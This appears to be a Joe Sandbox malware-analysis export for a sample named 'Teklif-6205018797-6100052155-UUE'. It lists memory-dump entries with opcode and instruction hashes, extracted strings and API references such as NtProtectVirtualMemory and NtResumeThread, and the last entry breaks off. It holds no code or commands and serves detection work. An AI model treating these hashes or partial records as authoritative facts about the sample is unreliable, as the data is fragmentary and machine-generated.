                                                          • Instruction ID: 6c32e6258993ea6fe9d1343a443f5d32cb11b6de1a4102f37e6f85df74b905a8
                                                          • Opcode Fuzzy Hash: 037297907759e2293f54243399ddd74b56959188b638ab2d94c1acb3755aa3c5
                                                          • Instruction Fuzzy Hash: 21629974A006158FCB58EFA9C494A7EFBF2FF88300F14856AE55AD7391DB34A905CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: ec3280b6a1f524844319c4f54126879776b61d85439f1ae0bd9eb46f21cbdca4
                                                          • Instruction ID: 631617eef39396c178d0e3585f615364cd31c876c187ebd0d50321bc4617f207
                                                          • Opcode Fuzzy Hash: ec3280b6a1f524844319c4f54126879776b61d85439f1ae0bd9eb46f21cbdca4
                                                          • Instruction Fuzzy Hash: 47F1E174A45218CFDB24CF69C884BA9BBF6BB49314F1081E9E90EE7255DB709E85CF01
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0598DD7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: bd5baecdf6f02c708a631f12ab65dd3828474e63895c6ce2d63be47c44651b95
                                                          • Instruction ID: 722fbabcdb94ade76fc6f76dd38c3808b2bc87726802daa2e7fc80f88b5ed57f
                                                          • Opcode Fuzzy Hash: bd5baecdf6f02c708a631f12ab65dd3828474e63895c6ce2d63be47c44651b95
                                                          • Instruction Fuzzy Hash: B4418AB4D002589FCF10DFAAD984AEEFBB5FB49310F10942AE819B7250D735A945CFA4
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0598DD7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 99eb112d4d2831a0c3d925fc54bbbca870970670bc70f3c05fe1857f7b30475e
                                                          • Instruction ID: 404058b0d4db57ce2743795ae6f1211c4e9ebc66a69fb9fcdb02d8311628a01d
                                                          • Opcode Fuzzy Hash: 99eb112d4d2831a0c3d925fc54bbbca870970670bc70f3c05fe1857f7b30475e
                                                          • Instruction Fuzzy Hash: 814179B8D042589FCF10DFAAD980AEEFBB5BF49310F10942AE819B7250D735A945CF64
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0598F28E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 36cd28a59dd703600115337b64c7b649de2972c6494754804043325e3d6026be
                                                          • Instruction ID: 55b91c5809547f4d1db95bc697145c10dbb37e7fa36d53ae37ac11104e0b72f7
                                                          • Opcode Fuzzy Hash: 36cd28a59dd703600115337b64c7b649de2972c6494754804043325e3d6026be
                                                          • Instruction Fuzzy Hash: 2F3114B9D052089FDB10EFA8E844AEEFBF1FF4A310F14902AE419B7251C735A845CB64
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0598F28E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 90dfbd93e537e9ab08627f6c731c31e01f0bd6565cfdd5be1d3878d122e09ad1
                                                          • Instruction ID: 74fee1ecc3a1769078aaa5fbf187e78fb3b2b84b501b74548bcae04af7902a1e
                                                          • Opcode Fuzzy Hash: 90dfbd93e537e9ab08627f6c731c31e01f0bd6565cfdd5be1d3878d122e09ad1
                                                          • Instruction Fuzzy Hash: CE319AB8D012189FCB10DFA9D984AEEFBF5FB49310F10942AE819B7200D775A945CF94
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0598F28E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: bc62ffb371f571631f39a77979cda0d8d78c2954333c9257c92475886e73ae17
                                                          • Instruction ID: 311ba3b1c7c0327d0ad817155e75dd1ba35553a6171e44e1cdb2e043b0c6843e
                                                          • Opcode Fuzzy Hash: bc62ffb371f571631f39a77979cda0d8d78c2954333c9257c92475886e73ae17
                                                          • Instruction Fuzzy Hash: 02318BB8D012189FCB10DFA9D984AEEFBF5FB49310F10942AE815B7200C775A945CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ddq
                                                          • API String ID: 0-562783569
                                                          • Opcode ID: 220c6ae343145e6f0e1275932e759ed70cf788435245fc7bfa629acf9693ede1
                                                          • Instruction ID: e6c0c29835711f78524c98da33444b5fb189bbbd4d0816e51871d451c8fda289
                                                          • Opcode Fuzzy Hash: 220c6ae343145e6f0e1275932e759ed70cf788435245fc7bfa629acf9693ede1
                                                          • Instruction Fuzzy Hash: 94D1CF74A01218CFDB54EFA9D984A9DBBF2FF89304F1085A9D409AB365DB31AD81CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 4f31d7d490ac273f77153dd24b72205d20bf827ccf546211b3ca72ccb9ec8924
                                                          • Instruction ID: 72d6191b1a849344d4a01fdd109d15497adf12541c7e09fff2f80c6c820b72c7
                                                          • Opcode Fuzzy Hash: 4f31d7d490ac273f77153dd24b72205d20bf827ccf546211b3ca72ccb9ec8924
                                                          • Instruction Fuzzy Hash: 18B115B0D05218CFDB24EFA9D844BBDBBF6BF49304FA498A9D009A7251DB744985CF24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 28c03adfafc34424da27f6963f08778da224c2f254ee65f9726eb27db8c32b79
                                                          • Instruction ID: 47e80d9e157b67490a9598c049e37d26f5d7a530cafafc988c88cd1f089d242f
                                                          • Opcode Fuzzy Hash: 28c03adfafc34424da27f6963f08778da224c2f254ee65f9726eb27db8c32b79
                                                          • Instruction Fuzzy Hash: 72B1D1B4E05208CFDB14CFAAD944AADBBF2BB49314F60816AD809EB351EB705D85CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: fc8bbb48eaca752a870f2fc0b50565603af6dfefb23847904c07126e2ed7fa58
                                                          • Instruction ID: c2386d8ed1c9cc40979bac77c6640daecd675210175491f2ae5cce850276166d
                                                          • Opcode Fuzzy Hash: fc8bbb48eaca752a870f2fc0b50565603af6dfefb23847904c07126e2ed7fa58
                                                          • Instruction Fuzzy Hash: CCB104B0D05208CFDB24EFA9D844BBDBBF6BB49304FA49869D009AB251DB745985CF24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: d010edbded77395ade0cce0da3a9ebde86a0964b88397f2d073cc826a2d5e30b
                                                          • Instruction ID: 3d03d77288d7437e08148664bbe6aaa9426ed6877f4e320a93eeac934f95728f
                                                          • Opcode Fuzzy Hash: d010edbded77395ade0cce0da3a9ebde86a0964b88397f2d073cc826a2d5e30b
                                                          • Instruction Fuzzy Hash: C6A1D2B4E05208CFDB14CFAAD945AADBBF2BB89314F608169D809EB355EB705D85CF01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 3d7e40b0787faa77fef4a2447fc53dfe253054f84e722c9909622476b39938bc
                                                          • Instruction ID: a721f185d512803db14c6652b6b53b4dd000959a5e554f0d0f1415e6d6236536
                                                          • Opcode Fuzzy Hash: 3d7e40b0787faa77fef4a2447fc53dfe253054f84e722c9909622476b39938bc
                                                          • Instruction Fuzzy Hash: 1891D274E05208CFDB14CFAAD945BADBBF2BB89314F609069D809EB255EB705D85CF01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tFindAtom
                                                          • API String ID: 0-1172336341
                                                          • Opcode ID: 1e036d2b74222ba2939efbbfe37039ae893d5084a6a593f23fea67009e2a9aae
                                                          • Instruction ID: e901ac977004d97446183f9bb8f9f80a7ca994f968af5b10777c79cd00f58623
                                                          • Opcode Fuzzy Hash: 1e036d2b74222ba2939efbbfe37039ae893d5084a6a593f23fea67009e2a9aae
                                                          • Instruction Fuzzy Hash: A181F670E01208DFDB44EFA9D484AAEBBF6FF89300F148069E409AB395DB34A945CF54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tFindAtom
                                                          • API String ID: 0-1172336341
                                                          • Opcode ID: e85bd0dc59676f6fd6ea8ca27ae6baa003fee9ded910d57f398c9f77d57a0364
                                                          • Instruction ID: f67c3534249469fff1c9acb72ff687782bba9c40dc2980f14006e2cc7b861520
                                                          • Opcode Fuzzy Hash: e85bd0dc59676f6fd6ea8ca27ae6baa003fee9ded910d57f398c9f77d57a0364
                                                          • Instruction Fuzzy Hash: C871E570E01208DFDB44EFA9D484AAEBBF6FF89300F148069E409AB395DB34A945CF54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1905aac939d8c67bc2e4836f8277ca7f49bb340505343492093bc30bb22572c
                                                          • Instruction ID: 86b77239d4040307180cf7e2bb8fab5e68b94c2b04f88f0ef42bc226c6cea462
                                                          • Opcode Fuzzy Hash: a1905aac939d8c67bc2e4836f8277ca7f49bb340505343492093bc30bb22572c
                                                          • Instruction Fuzzy Hash: 21C11774A01218CFEB54DFA9D998BADBBF6FB49304F1094A9D40DAB381CB745988CF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e413b8c5c6e7a7f0276704a7f2514dc3529fefb9981877fe8d59658429f57e08
                                                          • Instruction ID: c0b312faa011717f52c4d11c9ca2c4de15bdfbf1edc6b2241907c63db6aba486
                                                          • Opcode Fuzzy Hash: e413b8c5c6e7a7f0276704a7f2514dc3529fefb9981877fe8d59658429f57e08
                                                          • Instruction Fuzzy Hash: 70912778D05208CFDB04DFA8D444BAEBBFAFB49304F24946AE409AB295DB749959CF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d882fb4fd5f88ec8ebaa0db342b3f9c61468c3d70b7a9761001a8193fb6515e
                                                          • Instruction ID: faf7af4b1d29c904d22384bb55b6a2411984febe834109def5782bda3a7e806c
                                                          • Opcode Fuzzy Hash: 2d882fb4fd5f88ec8ebaa0db342b3f9c61468c3d70b7a9761001a8193fb6515e
                                                          • Instruction Fuzzy Hash: 18910570D05218CFEB64CF6AD844BADBBF2BB49328F6490A9D809E7251EB745D85CF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2af87c04121af7aadc6352826a97a985862c692788033963590af9f7388472c
                                                          • Instruction ID: 3141899b929febf274468f37f17664fc8dcdc02612135d72665f4008925c96b5
                                                          • Opcode Fuzzy Hash: a2af87c04121af7aadc6352826a97a985862c692788033963590af9f7388472c
                                                          • Instruction Fuzzy Hash: 1E813878E04208CFCB14DF68D494BADBBF6FB4A304F2490AAE409AB355DB759949CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b2264a6eedca3186f2a733fbed8e806132ca05728e17c29a647b27bc4c054c2
                                                          • Instruction ID: 6c6da8949fc3319c0199f18b3a75165badc2ad59ca469fdb882b3b75d6b561b7
                                                          • Opcode Fuzzy Hash: 9b2264a6eedca3186f2a733fbed8e806132ca05728e17c29a647b27bc4c054c2
                                                          • Instruction Fuzzy Hash: C6910470E05218CFEB64CF6AD944BADBBF2BB49324F6480A9D809E7251DBB45D85CF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eec030c70604ea92034e9c5b582eafa5b1a2defc25e738a8377409cc4b3c6209
                                                          • Instruction ID: 4878e155478d5f8a3669f800f943b9f94d55eb88d4dc78a504964cbc543e07dd
                                                          • Opcode Fuzzy Hash: eec030c70604ea92034e9c5b582eafa5b1a2defc25e738a8377409cc4b3c6209
                                                          • Instruction Fuzzy Hash: BA81E470D05218CFEB64CF6AD944BADBBF2BB49324F6490A9D809E7251EB749D80CF00

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Haq$Haq$Haq
                                                          • API String ID: 0-3013282719
                                                          • Opcode ID: 0ccbdf0e13a2bf42331536ef14d8976caf9473732ffb9311fde140f91b23a56d
                                                          • Instruction ID: fc884563a72fbfe7138773f4a0a0f13f083b3dd7d82a94ed56a8736ecbd143f1
                                                          • Opcode Fuzzy Hash: 0ccbdf0e13a2bf42331536ef14d8976caf9473732ffb9311fde140f91b23a56d
                                                          • Instruction Fuzzy Hash: E0124834A00604CFCB65DFA5C885AAEBBF6FF89300F148929E5069B355DB35ED46CB90

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q$4']q
                                                          • API String ID: 0-705557208
                                                          • Opcode ID: 244936e2f13b318d8667876b4c8c206d30faae5b436f4e3ca45a31e811e98b1e
                                                          • Instruction ID: 0b8b96a9013e7e8286b0221a0ce8792ad8de3bf98b9125d0725f850546280b6d
                                                          • Opcode Fuzzy Hash: 244936e2f13b318d8667876b4c8c206d30faae5b436f4e3ca45a31e811e98b1e
                                                          • Instruction Fuzzy Hash: 97F1B434A10118DFCB08DFA4D999EADBBB2FF89300F558559E806AB365DB71EC42CB50

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq$Haq
                                                          • API String ID: 0-2456560092
                                                          • Opcode ID: 20f30c91e258a23b6d9c4164e73c201debee28ff75fd2e9de270794243749a99
                                                          • Instruction ID: bc97a6d615e7beaa4cafb5a3f732cf7483524122a4c2b97b2db00e4d7effc473
                                                          • Opcode Fuzzy Hash: 20f30c91e258a23b6d9c4164e73c201debee28ff75fd2e9de270794243749a99
                                                          • Instruction Fuzzy Hash: 0FE13034B00209DFCB04EFA4D4959AEBBB6FF89300F158569E506AB365DB34ED42CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 469d7a587667b68d1400255fcd21e5d379c39247f342b77c4e3dfde4654b7643
                                                          • Instruction ID: e472b46c9859da37734f2734b0c99f6588b222d88d3ecb88215acd65862088ff
                                                          • Opcode Fuzzy Hash: 469d7a587667b68d1400255fcd21e5d379c39247f342b77c4e3dfde4654b7643
                                                          • Instruction Fuzzy Hash: C542B3B4E04209CFCB14DF98D458AFEBBB6FB49301F5080ADE91267295C7785982DF91

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]q$$]q
                                                          • API String ID: 0-127220927
                                                          • Opcode ID: cb96acf7142bb793848b4fdbcb05159b98249574eb39d305cbcf487011fa7ec9
                                                          • Instruction ID: 5fd2aa2909bd44801e00b18b0bcdbb135315029e45eeccc1786bdd6e1b687644
                                                          • Opcode Fuzzy Hash: cb96acf7142bb793848b4fdbcb05159b98249574eb39d305cbcf487011fa7ec9
                                                          • Instruction Fuzzy Hash: F0226938E00259CFCF15DFA4D84AAAEBBF6FF48300F198414E845AB294DB749956CF51

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 31ac2c73071d62f4e8cd6c8a866e1420a6ee3cbafdc23d99f8993a3a94d5307c
                                                          • Instruction ID: 560bc2197c927993b740cf4147c5e30f50a0f1ff109a6f67b29de1182a492356
                                                          • Opcode Fuzzy Hash: 31ac2c73071d62f4e8cd6c8a866e1420a6ee3cbafdc23d99f8993a3a94d5307c
                                                          • Instruction Fuzzy Hash: B922E274E05218CFCB24EFA4C5546ADBBB2BF8A301F6090ADD40AAB355CB746E85CF51

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: b731871a52ce7f4b81ac32d79032250529ce0aa183d0b405cb54d9eedf9c7693
                                                          • Instruction ID: 05b3b14a9460e9772fc9c102776d0da30e3b81bd5a6eab823c7317fe30c40249
                                                          • Opcode Fuzzy Hash: b731871a52ce7f4b81ac32d79032250529ce0aa183d0b405cb54d9eedf9c7693
                                                          • Instruction Fuzzy Hash: 84F1BF74E05218DFCB28DFA4E4986ADBBB2FF8A311F60516DE416A7391DB346985CF00

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$d
                                                          • API String ID: 0-3557608343
                                                          • Opcode ID: defcd87cdec5d435e410ba391f899a10ecb82b7a60dcb2bea368a45fdaab92a0
                                                          • Instruction ID: 7c5c1e1a9c6966b4a71017dc3fbd1e444e89e0d6708da483846c0492bce3b574
                                                          • Opcode Fuzzy Hash: defcd87cdec5d435e410ba391f899a10ecb82b7a60dcb2bea368a45fdaab92a0
                                                          • Instruction Fuzzy Hash: 89D14874600606CFCB14CF68C485E6AB7F6FF88310B198969E45A9B765DB30FD42CB94

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: 487d2e4b113382851483c6a0fc064341e19b5d38785d52fda9e8a1392acef92d
                                                          • Instruction ID: 03bb113c65122685ba03b3179b039a67ccf4f1ac78aad7fb12ead2a6fd41420e
                                                          • Opcode Fuzzy Hash: 487d2e4b113382851483c6a0fc064341e19b5d38785d52fda9e8a1392acef92d
                                                          • Instruction Fuzzy Hash: 7261DD303442108FD759ABB9C855A2E7BBBEF85304B2448ADE5069F3A1DF35EC06CB91

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq
                                                          • API String ID: 0-3916115647
                                                          • Opcode ID: eda86592aed88c8f815db0dee246dc617749fa9e09ddc7d638db0600a3b9a5d2
                                                          • Instruction ID: b4d9b150f2b45bfd5a09d1cbe29fe686644d493f0c1faba7e2c98b64e48623e7
                                                          • Opcode Fuzzy Hash: eda86592aed88c8f815db0dee246dc617749fa9e09ddc7d638db0600a3b9a5d2
                                                          • Instruction Fuzzy Hash: 2551BD313042059FDB559F69D856AAE3BA6FF85300F158069E906CB392CF35EC06CBA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: a756e0b8607db43cc60017dd27318629e0a117e25638192b91a5677fb193e52e
                                                          • Instruction ID: f1ee556eebdbf205c114682ed69831d9226452840144104a3c2270da04073a3e
                                                          • Opcode Fuzzy Hash: a756e0b8607db43cc60017dd27318629e0a117e25638192b91a5677fb193e52e
                                                          • Instruction Fuzzy Hash: 4351E1302047518FE324DF6AC44475BBBE6EFC5314F048A2DE05A8B7A6DB78E805CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $2
                                                          • API String ID: 0-4264767444
                                                          • Opcode ID: 95ff841e50dbbc6fe298fff22208aff6e17940a65729df5dc1ce4568577bf217
                                                          • Instruction ID: 5bf7baa8f1d678a0ae052ff0f1862424679f5395da6b9d1340b768c02a5ce048
                                                          • Opcode Fuzzy Hash: 95ff841e50dbbc6fe298fff22208aff6e17940a65729df5dc1ce4568577bf217
                                                          • Instruction Fuzzy Hash: C821B274A012298FDBA0CF64C894BEDBBB2EB49304F1085E9D41DA7250DB319EC5CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :$A
                                                          • API String ID: 0-646851060
                                                          • Opcode ID: a98bf664ab6d7d199571625581d0cf0950569c5aca94ba36f101e65c0cf8dc14
                                                          • Instruction ID: c69b27a5d957d97e82d1040a32fc62d2cbdf6b35d1cf86429d09d1ee7d8028ab
